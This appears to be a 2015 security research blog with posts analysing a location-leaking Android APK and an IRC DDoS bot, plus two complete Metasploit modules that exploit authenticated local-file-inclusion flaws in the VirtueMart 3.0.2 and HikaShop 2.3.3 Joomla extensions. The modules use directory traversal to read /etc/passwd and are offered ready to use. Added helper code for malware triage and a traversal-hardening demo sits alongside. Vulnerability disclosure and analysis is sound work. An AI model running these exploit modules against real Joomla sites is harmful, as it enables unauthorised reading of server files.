Wednesday, 28 January 2015

[PL] Analysis of the atticlab.bodyscanner.apk application



In this short post I will explain how I checked what the atticlab.bodyscanner.apk application does. I found the file while browsing http://contagiodump.blogspot.com/ [1] - thanks for the samples!


  
Sunday, 18 January 2015

[EN] kmt.apk - what's this?

A few days ago I found an Android application named 'kmt.apk'.

I was wondering what this app does... To check it, I used apktool.

The file listing showed me AndroidManifest.xml, so I was hoping to find out
what this app needs to run. This is what I found:

(screenshot: AndroidManifest.xml)

After checking that this app needs my location (or the location of my phone),
I was curious where (all of?) that data goes. This is what I found:

(screenshot: jd-gui in action)

(screenshot: jd-gui in action - sending params...)

Another one:

(screenshot: onCreate function)


And that's how I found this link :)

So it seems that this application is checking the location information on your
phone and sending it to this "erotte" web. For now we're done here. ;)

If you have some nice APK files to analyse, let me know via email. Thanks.

Cheers,
o/
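The two manual steps above (reading the permissions out of the apktool-decoded AndroidManifest.xml, then hunting through the jd-gui output for where the data goes) can be scripted. The block below is an added example and not code from the post: it lists the requested permissions, flags the sensitive ones, and pulls URL literals and data-reading API calls out of decompiled source. The manifest and the onCreate() fragment embedded in it are constructed samples with a made-up package name and host (example.invalid), not kmt.apk's real files:

```ruby
require 'rexml/document'

# Constructed sample: a manifest in the form apktool writes it (not kmt.apk's own).
SAMPLE_MANIFEST = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.sample">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application android:label="sample">
      <activity android:name=".MainActivity"/>
      <receiver android:name=".BootReceiver">
        <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
      </receiver>
    </application>
  </manifest>
XML

# Constructed sample: the kind of onCreate() jd-gui shows (the host is made up).
SAMPLE_SOURCE = <<~JAVA
  public void onCreate(Bundle b) {
    LocationManager lm = (LocationManager) getSystemService("location");
    Location loc = lm.getLastKnownLocation("gps");
    TelephonyManager tm = (TelephonyManager) getSystemService("phone");
    String url = "http://example.invalid/collect.php?lat=" + loc.getLatitude()
               + "&lon=" + loc.getLongitude() + "&imei=" + tm.getDeviceId();
    new DefaultHttpClient().execute(new HttpGet(url));
  }
JAVA

# Permissions that deserve a second look in an app of unknown origin.
SENSITIVE_PERMISSIONS = %w[
  ACCESS_FINE_LOCATION ACCESS_COARSE_LOCATION READ_PHONE_STATE READ_SMS SEND_SMS
  RECEIVE_SMS READ_CONTACTS RECORD_AUDIO CAMERA RECEIVE_BOOT_COMPLETED
].freeze

# Android APIs that read the data such an app typically sends home.
DATA_APIS = %w[getLastKnownLocation getLatitude getLongitude getDeviceId
               getLine1Number getSimSerialNumber getSubscriberId].freeze

# Short names of every <uses-permission> in the manifest, in document order.
def permissions(manifest_xml)
  doc = REXML::Document.new(manifest_xml)
  REXML::XPath.match(doc, '//uses-permission').map do |node|
    node.attributes['android:name'].to_s.sub('android.permission.', '')
  end
end

# The requested permissions that are on the sensitive list.
def sensitive_permissions(manifest_xml)
  permissions(manifest_xml) & SENSITIVE_PERMISSIONS
end

# Every http(s) URL literal in decompiled source (what the post found by eye).
def find_urls(source)
  source.scan(%r{https?://[\w.\-]+(?::\d+)?(?:/[^\s"']*)?}).uniq
end

# Which data-reading APIs the source calls.
def data_apis(source)
  DATA_APIS.select { |api| source.include?(api) }
end

# One-shot summary: what the app may collect and where it may send it.
def triage(manifest_xml, source)
  {
    permissions: permissions(manifest_xml),
    sensitive:   sensitive_permissions(manifest_xml),
    urls:        find_urls(source),
    data_apis:   data_apis(source)
  }
end

if $PROGRAM_NAME == __FILE__
  triage(SAMPLE_MANIFEST, SAMPLE_SOURCE).each { |key, val| puts "#{key}: #{val.inspect}" }
end
```

Run it against the output of `apktool d kmt.apk` by reading the decoded manifest and the jd-gui exports into the two arguments; the URL regex stops at a quote, so a URL built by string concatenation (as in the sample) shows up as its constant prefix, which is usually enough to find the endpoint.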

[EN] Checking Illusion Bot

I was checking other stuff and suddenly found "Illusion Bot". It seems to be a small IRC DDoS bot. ;]

Let's see...

Download:
You can easily find it on the web.

Unzipped, it looks like this:

(screenshot: Unzipped)

I decided to check the web files first... but I don't understand all of it... ;]

(screenshot: Sorry - don't understand)

So I decided to use the nice and friendly 'strings' command, piped through a few greps:

(screenshot: Commands to use for this bot)

Of course in those PHP files (index.php and upgrade.php) you can find more things, like
how this backdoor installs itself on the WWW server, how it sends commands, etc.

(screenshot: Bots tables)

The base64-decoded files now look like this:

...and the commands again:

The view from IDA:

And this is my favourite :D

can you see it? ;)

More, maybe soon. ;)

Cheers,
o/
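The triage above (strings with a few greps, then base64-decoding the PHP panel files) can be scripted as well. The block below is an added example, not code from the post or from the bot: a minimal strings(1), a loop that peels nested eval(base64_decode('...')) layers out of a PHP file until plain source is left, and the grep for quoted "!command" literals and table names that follows. The panel file and the binary blob it runs on are constructed samples; the command names and table name in them are made up, not Illusion Bot's:

```ruby
require 'base64'

# Constructed sample of a bot panel file, wrapped twice in eval(base64_decode())
# the way obfuscated PHP backdoors usually are. The command names are invented.
INNER_PHP = <<~'PHP'
  <?php
  $commands = array("!syn", "!udp", "!http", "!update", "!uninstall");
  if (isset($_GET['cmd']) && in_array($_GET['cmd'], $commands)) {
      mysql_query("INSERT INTO bots_cmd VALUES ('" . $_GET['cmd'] . "')");
  }
  ?>
PHP
LAYER_ONE  = "<?php eval(base64_decode('#{Base64.strict_encode64(INNER_PHP)}')); ?>"
SAMPLE_PHP = "<?php eval(base64_decode(\"#{Base64.strict_encode64(LAYER_ONE)}\")); ?>"

# Constructed sample of a binary: printable runs separated by non-printable bytes.
SAMPLE_BIN = "\x00\x01irc.example.invalid\x00\xFF\x7FPRIVMSG\x02\x03ab\x00#channel".b

# strings(1): runs of at least `min` printable ASCII bytes.
def strings(data, min = 4)
  data.b.scan(/[\x20-\x7e]{#{min},}/n)
end

# A base64_decode('...') / base64_decode("...") call with a literal argument.
B64_CALL = /base64_decode\(\s*(['"])([A-Za-z0-9+\/=\s]+)\1\s*\)/

# Replace each base64_decode('<literal>') with its decoded text, repeating while
# the result still contains such a call. Returns [decoded_text, layers_peeled].
def peel_base64(text, max_layers = 10)
  layers = 0
  while layers < max_layers && (m = B64_CALL.match(text))
    decoded = Base64.decode64(m[2].delete(" \t\r\n")).force_encoding(text.encoding)
    break unless decoded.valid_encoding?   # stop on a blob that is not text
    text = text.sub(m[0]) { decoded }      # block form: no backslash expansion
    layers += 1
  end
  [text, layers]
end

# Quoted "!command" literals, i.e. the grep the post ran over the panel files.
def bot_commands(text)
  text.scan(/["'](![A-Za-z0-9_.]+)["']/).flatten.uniq
end

# Peel, then pull out the command list and the tables the panel writes to.
def analyse_panel(php_source)
  plain, layers = peel_base64(php_source)
  { layers: layers,
    commands: bot_commands(plain),
    tables: plain.scan(/INTO\s+(\w+)/).flatten.uniq }
end

if $PROGRAM_NAME == __FILE__
  puts strings(SAMPLE_BIN).inspect
  puts analyse_panel(SAMPLE_PHP).inspect
end
```

Feed `File.binread('bot.exe')` to `strings` and `File.read('index.php')` to `analyse_panel`; the peeler deliberately stops when a decoded layer is not valid text, which is the usual sign that the blob is gzip'd or otherwise packed and needs another step first.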

Monday, 12 January 2015

[EN] VirtueMart 3 - LFI for Metasploit

Following the last few posts, below you can find another small PoC exploit for an LFI vulnerability, this time found in the latest VirtueMart (3.0.2).

Because it's for Joomla again, it's once more based on the HikaShop LFI PoC.

Enjoy:

(screenshot: Preparing to exploit...)

(screenshot: Raw results)

And the code:
---<virtuemart_auth_lfi.rb>---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VirtueMart 3 - LFI poc for authenticated users',
      'Description'    => %q{
        VirtueMart 3.0.2 is vulnerable to a local file include attack.
        An authenticated user can read local files from the server.

        More here: https://twitter.com/HauntITBlog
      },
      'Author'         =>
        [
          'HauntIT Blog', # Discovery, MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
          'http://hauntit.blogspot.com'
        ],
      'License'        => MSF_LICENSE,
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', {} ]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 23 2014'))  # Metasploit wants 'Mon DD YYYY', not '23.12.2014'
    register_options(
      [
        OptString.new('TARGETURI', [ true,  'Base Joomla directory path', 'joomla']),
        OptString.new('USERNAME',  [ true,  'Username to authenticate with', 'admin']),
        OptString.new('PASSWORD',  [ false, 'Password to authenticate with', 'admin']),
      ], self.class)
  end

  # This PoC does no fingerprinting of its own, so say so instead of returning nil.
  def check
    Exploit::CheckCode::Unknown
  end

  # Joomla's login form carries its CSRF token as a hidden input whose *name*
  # is a 32-char hex string and whose value is "1"; return that name, or nil.
  # Matching the whole tag (rather than the first 32-hex run anywhere in the
  # body) avoids picking up some unrelated hash.
  def fetch_token(body)
    body =~ /<input type="hidden" name="([0-9a-fA-F]{32})" value="1"/ ? $1 : nil
  end

  # Merge "name=value; ..." cookie strings; later jars override earlier ones.
  def merge_cookies(*jars)
    jar = {}
    jars.each do |j|
      j.to_s.split(/;\s*/).each do |kv|
        name, value = kv.split('=', 2)
        jar[name] = value unless name.to_s.empty?
      end
    end
    jar.map { |name, value| "#{name}=#{value}" }.join('; ')
  end

  def exploit
    # The file to read, and the page Joomla should land on after login.
    readthis   = '../../../../../../../../../../../../../../../../../../etc/passwd'
    return_url = "index.php?option=com_virtuemart&view=log&task=edit&logfile=#{readthis}"

    # 1st request: the admin login page gives us the session cookie and the token
    req1 = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'administrator', 'index.php')
    })
    fail_with(Failure::Unreachable, 'Failed with 1st request (no login page)') if req1.nil?
    cookies = req1.get_cookies
    print_status("Response code: #{req1.code}")
    print_good("Got cookie(s): #{cookies}")

    token = fetch_token(req1.body)
    fail_with(Failure::UnexpectedReply, 'Token not found in login page') if token.nil?
    print_good("Got token: #{token}")

    # 2nd request: authenticate with that token and cookie. 'return' is the
    # base64-encoded post-login redirect target, which com_login expects.
    print_status('Trying to auth...')
    auth = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'    => cookies,
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'passwd'   => datastore['PASSWORD'],
        'option'   => 'com_login',
        'task'     => 'login',
        'return'   => Rex::Text.encode_base64(return_url),
        token      => '1'
      }
    })
    fail_with(Failure::Unreachable, 'No response to the login request') if auth.nil?
    print_good("Code after auth: #{auth.code}")
    # Joomla may hand out a fresh session cookie on login; keep whatever it set.
    cookies = merge_cookies(cookies, auth.get_cookies)

    # 3rd request: the LFI. VirtueMart puts 'logfile' straight into the path of
    # the log it opens, so the traversal walks out of the log directory.
    print_status('Exploit...')
    xpl = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'   => cookies,
      'vars_get' => {
        'option'  => 'com_virtuemart',
        'view'    => 'log',
        'task'    => 'edit',
        'logfile' => readthis
      }
    })
    fail_with(Failure::Unreachable, 'Cannot exploit it :C (no response)') if xpl.nil?
    print_good("Exploit response code: #{xpl.code}")
    print_good('Response body after attack:')
    print_line(xpl.body)
  end # exploit

end
---<virtuemart_auth_lfi.rb>---

Pastebin version is here.


Cheers,
o/

Saturday, 3 January 2015

[EN] HikaShop LFI - Metasploit module

Nearly two weeks ago I wrote a little article about vulnerabilities in multiple plugins for Joomla.

There we talked about creating your own proof-of-concept for Metasploit. So now should be a good time to prepare something more useful.

Below you will find a dirty MSF PoC for the LFI vulnerability located in HikaShop 2.3.3. ;)

Let me know if your Joomla is vulnerable. ;) If you have any trouble running this PoC,
just check how I've done it before or feel free to contact me with any questions/suggestions.

Loading exploit:

Running:

... and finally we get the content of /etc/passwd:

Code:
---<hikashop_auth_lfi.rb>---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HikaShop - LFI poc for authenticated users',
      'Description'    => %q{
        HikaShop 2.3.3 is vulnerable to a local file include attack.
        An authenticated user can read local files from the server.

        Vulnerability was described on https://twitter.com/HauntITBlog
      },
      'Author'         =>
        [
          'HauntIT Blog', # Discovery / msf module
          'http://hauntit.blogspot.com'
        ],
      'License'        => MSF_LICENSE,
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', {} ]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 3 2015'))  # Metasploit wants 'Mon DD YYYY', not '03.01.2015'
    register_options(
      [
        OptString.new('TARGETURI', [ true,  'Base Joomla directory path', 'joomla']),
        OptString.new('USERNAME',  [ true,  'Username to authenticate with', 'admin']),
        OptString.new('PASSWORD',  [ false, 'Password to authenticate with', 'admin']),
        # OptRegexp compiles the string as-is, so a default of '/error/' would
        # only match the literal text with the slashes; give it the bare pattern.
        OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', 'error' ]),
      ], self.class)
  end

  # This PoC does no fingerprinting of its own, so say so instead of returning nil.
  def check
    Exploit::CheckCode::Unknown
  end

  # Joomla's login form carries its CSRF token as a hidden input whose *name*
  # is a 32-char hex string and whose value is "1"; return that name, or nil.
  # Matching the whole tag (rather than the first 32-hex run anywhere in the
  # body) avoids picking up some unrelated hash.
  def fetch_token(body)
    body =~ /<input type="hidden" name="([0-9a-fA-F]{32})" value="1"/ ? $1 : nil
  end

  # Merge "name=value; ..." cookie strings; later jars override earlier ones.
  def merge_cookies(*jars)
    jar = {}
    jars.each do |j|
      j.to_s.split(/;\s*/).each do |kv|
        name, value = kv.split('=', 2)
        jar[name] = value unless name.to_s.empty?
      end
    end
    jar.map { |name, value| "#{name}=#{value}" }.join('; ')
  end

  def exploit
    # HikaShop's view editor takes id = <n>|<template>|<type>|<component>|<view>|<file>
    # and uses the last field as a file name, so a traversal there reads any file
    # the web server can. 'return' is the base64 post-login redirect com_login expects.
    readthis   = '../../../../../../../../../../../../../../../../../../etc/passwd'
    lfi_id     = "0|beez3|component|com_hikashop|address|#{readthis}"
    return_url = "index.php?option=com_hikashop&ctrl=view&task=edit&id=#{lfi_id}"

    # 1st request: the admin login page gives us the session cookie and the token
    req1 = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'administrator', 'index.php')
    })
    fail_with(Failure::Unreachable, 'Failed with 1st request (no login page)') if req1.nil?
    cookies = req1.get_cookies
    print_status("Resp code: #{req1.code}")
    print_good("Cookie(s) : #{cookies}")

    token = fetch_token(req1.body)
    fail_with(Failure::UnexpectedReply, 'Token not found in login page') if token.nil?
    print_good("Token : #{token}")

    # 2nd request: authenticate with that token and cookie
    print_status('2nd request (post with auth)')
    auth = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'    => cookies,
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'passwd'   => datastore['PASSWORD'],
        'option'   => 'com_login',
        'task'     => 'login',
        'return'   => Rex::Text.encode_base64(return_url),
        token      => '1'
      }
    })
    fail_with(Failure::Unreachable, 'No response to the login request') if auth.nil?
    print_good("Code after auth: #{auth.code}")

    # FAILPATTERN is only a heuristic: a failed Joomla login usually answers with a
    # redirect and an empty body, so the final response below is the real test.
    fail_re = datastore['FAILPATTERN']
    fail_re = Regexp.new(fail_re.to_s) unless fail_re.nil? || fail_re.is_a?(Regexp)
    print_error('FAILPATTERN matched the login response, login probably failed') if fail_re && auth.body =~ fail_re
    # Joomla may hand out a fresh session cookie on login; keep whatever it set.
    cookies = merge_cookies(cookies, auth.get_cookies)

    # 3rd request: the LFI itself
    print_status('and now 3rd request...')
    xpl = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'   => cookies,
      'vars_get' => {
        'option' => 'com_hikashop',
        'ctrl'   => 'view',
        'task'   => 'edit',
        'id'     => lfi_id
      }
    })
    fail_with(Failure::Unreachable, 'Cannot exploit it :C (no response)') if xpl.nil?
    print_good("3rd response code: #{xpl.code}")
    print_good('3rd (full) response body:')
    print_line(xpl.body)
  end # exploit

end
---<hikashop_auth_lfi.rb>---

And the pastebin version is here.
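What this module and the VirtueMart one above both exercise is the same primitive: a request parameter ('logfile' in VirtueMart, the last '|'-separated field of 'id' in HikaShop) is joined onto a directory and opened, with nothing stopping '../' from walking out of that directory. The block below is an added example and not code from either extension or either module: it models that join against a small in-memory file system, runs both modules' payload strings through it, and puts a hardened resolver beside it. The log directory, file names and file contents are assumptions made for the demo:

```ruby
# Assumed Joomla install and log directory (hypothetical paths, not the real ones).
LOG_DIR = '/var/www/joomla/administrator/logs'.freeze

# Stand-in for the server's file system, so the demo touches nothing on disk.
FILES = {
  "#{LOG_DIR}/2015-01-12.log"  => "log line from the shop\n",
  '/var/log/apache2/error.log' => "[error] constructed apache error line\n",
  '/etc/passwd'                => "root:x:0:0:root:/root:/bin/bash\n"
}.freeze

# The traversal strings sent by the two modules (copied from their payloads).
VIRTUEMART_LOGFILE = '../../../../../../../../../../../../../../../../../../etc/passwd'.freeze
HIKASHOP_ID        = '0|beez3|component|com_hikashop|address|' \
                     '../../../../../../../../../../../../../../../../../../etc/passwd'.freeze

class TraversalError < StandardError; end

# What the kernel does with the path the application hands to open(): resolve
# ".." lexically (a surplus of ".." simply stops at "/") and look the file up.
def os_open(path)
  FILES.fetch(File.expand_path(path)) { raise Errno::ENOENT, path }
end

# HikaShop's view editor 'id' is "<n>|<template>|<type>|<component>|<view>|<file>";
# the last field is the file name that ends up in the path.
def hikashop_view_file(id)
  id.split('|').last.to_s
end

# Vulnerable pattern: the user-supplied name is glued onto the directory as-is.
def vulnerable_read(dir, name)
  os_open(File.join(dir, name))
end

# Hardened: canonicalise first, then insist the result is still inside `dir`
# and carries the one extension this endpoint is meant to serve.
def safe_read(dir, name, ext = '.log')
  raise TraversalError, 'empty file name' if name.to_s.empty?
  raise TraversalError, 'home-directory expansion not allowed' if name.start_with?('~')
  raise TraversalError, "only #{ext} files may be read" unless name.end_with?(ext)
  full = File.expand_path(name, dir)
  raise TraversalError, "#{name.inspect} resolves outside #{dir}" unless full.start_with?(dir + '/')
  os_open(full)
end

if $PROGRAM_NAME == __FILE__
  puts vulnerable_read(LOG_DIR, VIRTUEMART_LOGFILE)
  puts vulnerable_read(LOG_DIR, hikashop_view_file(HIKASHOP_ID))
  begin
    safe_read(LOG_DIR, VIRTUEMART_LOGFILE)
  rescue TraversalError => e
    puts "blocked: #{e.message}"
  end
end
```

The prefix check is done on the canonicalised path, not on the raw parameter, which is why a name like 'x/../../other.log' is caught even though it contains no leading '../'; the extension check on its own would let a '.log' file anywhere on the box through, so the two checks are needed together.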

Happy New Year! ;)